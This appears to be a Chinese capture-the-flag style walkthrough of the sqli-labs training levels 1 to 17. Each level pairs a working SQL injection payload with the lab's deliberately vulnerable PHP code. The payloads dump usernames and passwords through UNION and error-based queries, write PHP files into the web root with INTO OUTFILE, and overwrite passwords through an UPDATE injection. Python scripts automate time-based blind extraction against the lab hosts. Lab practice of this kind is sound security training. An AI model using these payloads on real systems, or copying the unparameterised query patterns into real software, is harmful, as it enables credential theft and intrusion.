Less-1

payload:

?id=0' union select database(),group_concat(username),group_concat(password) from users--+

php:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

Less-2

payload:

?id=0 union select 1,group_concat(username),group_concat(password) from users --+

php:

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

Less-3

payload:

?id=0') union select 1,group_concat(username),group_concat(password) from users --+

php:

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

Less-4

payload:

?id=0") union select 1,group_concat(username),group_concat(password) from users --+

php:

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

Less-5

payload:

?id=0' and extractvalue(1,concat(1,(select group_concat(username,':',password) from users where username!='此处加入想排除的字符,可往后查找')))--+

php:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	echo '<font size="3" color="#FFFF00">';
	print_r(mysql_error());
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	}

Less-6

payload:

?id=0" and extractvalue(1,concat(1,(select group_concat(username,':',password) from users where username!='此处加入想排除的字符,可往后查找')))--+

php:

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
下面的同Less-5

Less-7

Method:into outfile 文件写入操作,如下:

payload:

?id=1')) union select 1,2,'' into outfile "C:\\xampp\\htdocs\\sqli\\Less-7\\1.php" --+

php:

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
	if($row)
	{
  	echo '<font color= "#FFFF00">';	
  	echo 'You are in.... Use outfile......';
  	echo "<br>";
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	echo 'You have an error in your SQL syntax';
	//print_r(mysql_error());
	echo "</font>";  
	}

Less-8

payload:

?id=1' union select 1,2,'' into outfile "C:\\xampp\\htdocs\\sqli\\Less-8\\1.php" --+

php:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	echo '<font size="5" color="#FFFF00">';
	//echo 'You are in...........';
	//print_r(mysql_error());
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	}

Less-9

payload:

?id=1' union select 1,2,'' into outfile "C:\\xampp\\htdocs\\sqli\\Less-9\\1.php" --+

php:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	echo '<font size="5" color="#FFFF00">';
	echo 'You are in...........';
	//print_r(mysql_error());
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	}

Less-10

payload:

?id=1" union select 1,2,'' into outfile "C:\\xampp\\htdocs\\sqli\\Less-10\\1.php" --+

php:

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
echo $sql;
echo "<br>";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	
	echo '<font size="5" color="#FFFF00">';
	echo 'You are in...........';
	//print_r(mysql_error());
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	
	}

Less-11

payload:

uname: 1' union select group_concat(username),group_concat(password) from users;#

php:

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);
	if($row)
	{
  		//echo '<font color= "#0000ff">';	
  		echo "<br>";
		echo '<font color= "#FFFF00" font size = 4>';
		//echo " You Have successfully logged in\n\n " ;
		echo '<font size="3" color="#0000ff">';	
		echo "<br>";
		echo 'Your Login name:'. $row['username'];
		echo "<br>";
		echo 'Your Password:' .$row['password'];
		echo "<br>";
		echo "</font>";
		echo "<br>";
		echo "<br>";
		echo '<img src="../images/flag.jpg"  />';	
  		echo "</font>";
  	}
	else  
	{
		echo '<font color= "#0000ff" font size="3">';
		//echo "Try again looser";
		print_r(mysql_error());
		echo "</br>";
		echo "</br>";
		echo "</br>";
		echo '<img src="../images/slap.jpg" />';	
		echo "</font>";  
	}

Less-12

payload:

uname: 1") union select group_concat(username),group_concat(password) from users;#

php:

$uname='"'.$uname.'"';
	$passwd='"'.$passwd.'"'; 
	@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);

	if($row)
	{
  		//echo '<font color= "#0000ff">';	
  		
  		echo "<br>";
		echo '<font color= "#FFFF00" font size = 4>';
		//echo " You Have successfully logged in " ;
		echo '<font size="3" color="#0000ff">';	
		echo "<br>";
		echo 'Your Login name:'. $row['username'];
		echo "<br>";
		echo 'Your Password:' .$row['password'];
		echo "<br>";
		echo "</font>";
		echo "<br>";
		echo "<br>";
		echo '<img src="../images/flag.jpg"   />';	
		
  		echo "</font>";
  	}
	else  
	{
		echo '<font color= "#0000ff" font size="3">';
		//echo "Try again looser";
		print_r(mysql_error());
		echo "</br>";
		echo "</br>";
		echo "</br>";
		echo '<img src="../images/slap.jpg"   />';	
		echo "</font>";  
	}

Less-13

payload:

uname: 1') and extractvalue(1,concat(1,(select group_concat(username,':',password) from users where username!='此处加入想排除的字符,可往后查找' )));#

php:

@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);

	if($row)
	{
  		//echo '<font color= "#0000ff">';	
  		
  		echo "<br>";
		echo '<font color= "#FFFF00" font size = 4>';
		//echo " You Have successfully logged in " ;
		echo '<font size="3" color="#0000ff">';	
		echo "<br>";
		//echo 'Your Login name:'. $row['username'];
		//echo "<br>";
		//echo 'Your Password:' .$row['password'];
		//echo "<br>";
		echo "</font>";
		echo "<br>";
		echo "<br>";
		echo '<img src="../images/flag.jpg"   />';	
		
  		echo "</font>";
  	}
	else  
	{
		echo '<font color= "#0000ff" font size="3">';
		//echo "Try again looser";
		print_r(mysql_error());
		echo "</br>";
		echo "</br>";
		echo "</br>";
		echo '<img src="../images/slap.jpg"   />';	
		echo "</font>";  
	}

Less-14

payload:

uname: 1" and extractvalue(1,concat(1,(select group_concat(username,':',password) from users where username!='此处加入想排除的字符,可往后查找' )));#

php:

$uname='"'.$uname.'"';
	$passwd='"'.$passwd.'"'; 
	@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);

	if($row)
	{
  		//echo '<font color= "#0000ff">';	
  		
  		echo "<br>";
		echo '<font color= "#FFFF00" font size = 4>';
		//echo " You Have successfully logged in " ;
		echo '<font size="3" color="#0000ff">';	
		echo "<br>";
		//echo 'Your Login name:'. $row['username'];
		//echo "<br>";
		//echo 'Your Password:' .$row['password'];
		//echo "<br>";
		echo "</font>";
		echo "<br>";
		echo "<br>";
		echo '<img src="../images/flag.jpg" />';	
		
  		echo "</font>";
  	}
	else  
	{
		echo '<font color= "#0000ff" font size="3">';
		//echo "Try again looser";
		print_r(mysql_error());
		echo "</br>";
		echo "</br>";
		echo "</br>";
		echo '<img src="../images/slap.jpg"  />';	
		echo "</font>";  
	}

Less-15

Python(盲注):

import requests
import time
import sys

# config-start
sleep_time = 1
error_time = 0.1
# config-end

def getPayload(indexOfResult, indexOfChar, mid):
    # admin' or ()-- 
    column_name="password"
    table_name="username"
    database_name="users"
    payload = "((ascii(substring((select " + column_name + " from " + database_name + "  limit " + indexOfResult + ",1)," + indexOfChar + ",1)))=" + mid + ")"#此处更改sql语句
    payload = {"uname":"' or ((" + payload + ") and sleep(" + str(sleep_time) + "))-- ","passwd":"admin"}
    return payload

def exce(indexOfResult,indexOfChar,queryASCII):
    # content-start
    url = "http://127.0.0.1:801/sqli/Less-15/"
    postData = getPayload(indexOfResult,indexOfChar,queryASCII)
    before_time = time.time()
    requests.post(url, data=postData)
    after_time = time.time()
    # content-end
    use_time = after_time - before_time
    # judge-start
    # 当sleep函数被执行 , 说明查询是正确的 (因为穷举毕竟错误的情况更多 , 要构造SQL语句让正确的情况执行sleep函数从而提高效率)
    # 当使用二分查找的时候 , 控制正确/错误的时候执行sleep函数就不那么重要了
    if abs(use_time) > error_time: 
        return True
    else:
        return False
    # judge-end

def doSearch(indexOfResult,indexOfChar):
    # 根据数据库中出现的字符的频率顺序重新构造列表进行查询
    order = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','_','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',' ','!','"','#','$','%','&','\'','(',')','*','+',',','-','.','/','0','1','2','3','4','5','6','7','8','9',':',';','<','=','>','?','@','[','\\',']','^','`','{','|','}','~']
    for queryChar in order:
        queryASCII = ord(queryChar)
        if exce(str(indexOfResult),str(indexOfChar + 1), str(queryASCII)):
            return chr(queryASCII)
    return chr(1)

def search():
    for i in range(32): # 需要遍历的查询结果的数量
        counter = 0
        for j in range(32): # 结果的长度
            counter += 1
            temp = doSearch(i, j) # 从255开始查询
            if ord(temp) == 1: # 当为1的时候说明已经查询结束
                break
            sys.stdout.write(temp)
            sys.stdout.flush()
        if counter == 1: # 当结果集的所有行都被遍历后退出
            break
        sys.stdout.write("\r\n")
        sys.stdout.flush()

search()
代码来源:https://www.jianshu.com/p/e5a42373ed12

php:

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
	echo $sql;
	echo "<br>";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);

	if($row)
	{
  		//echo '<font color= "#0000ff">';	
  		
  		echo "<br>";
		echo '<font color= "#FFFF00" font size = 4>';
		//echo " You Have successfully logged in\n\n " ;
		echo '<font size="3" color="#0000ff">';	
		echo "<br>";
		//echo 'Your Login name:'. $row['username'];
		echo "<br>";
		//echo 'Your Password:' .$row['password'];
		echo "<br>";
		echo "</font>";
		echo "<br>";
		echo "<br>";
		echo '<img src="../images/flag.jpg"  />';	
		
  		echo "</font>";
  	}
	else  
	{
		echo '<font color= "#0000ff" font size="3">';
		//echo "Try again looser";
		//print_r(mysql_error());
		echo "</br>";
		echo "</br>";
		echo "</br>";
		echo '<img src="../images/slap.jpg"   />';	
		echo "</font>";  
	}

Less-16

把Less-15脚本SQL语句中前面的” ‘ “换成” “) “即可

Less-17

php

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

function check_input($value)
	{
	if(!empty($value))//检查是否为空
		{
		// truncation (see comments)
		$value = substr($value,0,15);//截取前面15个字符
		}

		// Stripslashes if magic quotes enabled
		if (get_magic_quotes_gpc())//此方法当magic_quotes_gpc开启时所有的 ' (单引号)、" (双引号)、\(反斜杠)和 NULL字符都会被一个反斜杠自动转义。 但在php5.4起已经被放弃,始终返回false
		{
			$value = stripslashes($value);//去除反斜杠
		}

		// Quote if not a number
		if (!ctype_digit($value))//纯数字检测
		{
			$value = "'" . mysql_real_escape_string($value) . "'";//mysql_real_escape_string对字符串中的特殊字符进行转义,会被进行转义的字符包括: NULL(ASCII 0),\n,\r,\,'," 和 Control-Z. 
		}
	else
		{
		$value = intval($value);//获取变量的整数值
		}
	return $value;
	}

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
	//making sure uname is not injectable
	$uname=check_input($_POST['uname']);  //uname被check_input了,详见上面的代码

	$passwd=$_POST['passwd'];

	//logging the connection parameters to a file for analysis.
	$fp=fopen('result.txt','a');
	fwrite($fp,'User Name:'.$uname."\n");
	fwrite($fp,'New Password:'.$passwd."\n");
	fclose($fp);

	// connectivity 
	@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
	echo $sql;
	echo "<br>";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);
	//echo $row;
	if($row)
	{
  		//echo '<font color= "#0000ff">';	
		$row1 = $row['username'];  	
		//echo 'Your Login name:'. $row1;
		$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
		mysql_query($update);
  		echo "<br>";
		if (mysql_error())
		{
			echo '<font color= "#FFFF00" font size = 3 >';
			print_r(mysql_error());
			echo "</br></br>";
			echo "</font>";
		}
		else
		{
			echo '<font color= "#FFFF00" font size = 3 >';
			//echo " You password has been successfully updated " ;		
			echo "<br>";
			echo "</font>";
		}
		echo '<img src="../images/flag1.jpg"   />';	
		//echo 'Your Password:' .$row['password'];
  		echo "</font>";
  	}
	else  
	{
		echo '<font size="4.5" color="#FFFF00">';
		//echo "Bug off you Silly Dumb hacker";
		echo "</br>";
		echo '<img src="../images/slap1.jpg"   />';
	
		echo "</font>";  
	}
}

?>

python

import requests
str = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,_!@#$%^&*."
url = "http://192.168.184.1:801/sqli/Less-17/"
for i in range(1,200):
    for j in str:
        #1' where username='admin' and if(mid((select database()),1,1)= 's',sleep(3),1)#
        #1' where username='admin' and if(mid((select  database()),{},1)= '{}',sleep(3),1)#
        #1' where username='admin' and if(mid((select group_concat(table_name,'') from information_schema.tables where table_schema=database()),{},1)= '{}',sleep(3),1)#
        #1' where username='admin' and if(mid((select group_concat(column_name,'') from information_schema.columns where table_name='users' and table_schema=database()),{},1)= '{}',sleep(3),1)#
        #1' where username='admin' and if(substr((select * from (select GROUP_CONCAT(BINARY(username),',',BINARY(password)) from users) as temp),{},1)= '{}',sleep(3),1)#
        flag = "1' where username='admin' and if(substr((select * from (select GROUP_CONCAT(BINARY(username),',',BINARY(password)) from users) as temp),{},1)= '{}',sleep(3),1)#".format(i,j)
        data = {"uname":"admin","passwd":flag,"submit":"submit"}
        r = requests.post(url,data=data)
        #print("{}".format(r.status_code))
        if r.elapsed.total_seconds()>2:
            print(j,end = '')
            break

加上where username='admin'是为了减少爆破时间,因为在改password的时候就只会改adminpassword了,如果不加上亦可,不加上的话会将所有的password都改为1,但也达到了目的,在最后爆破字段的时候采用了一个虚表temp,因为update操作和select操作都作用于一张表,且会报错:Table 'test' is specified twice, both as a target for 'UPDATE' and as a separate source for data所以采用虚表进行盲注,且使用了BINARY函数来区分表中内容的大小写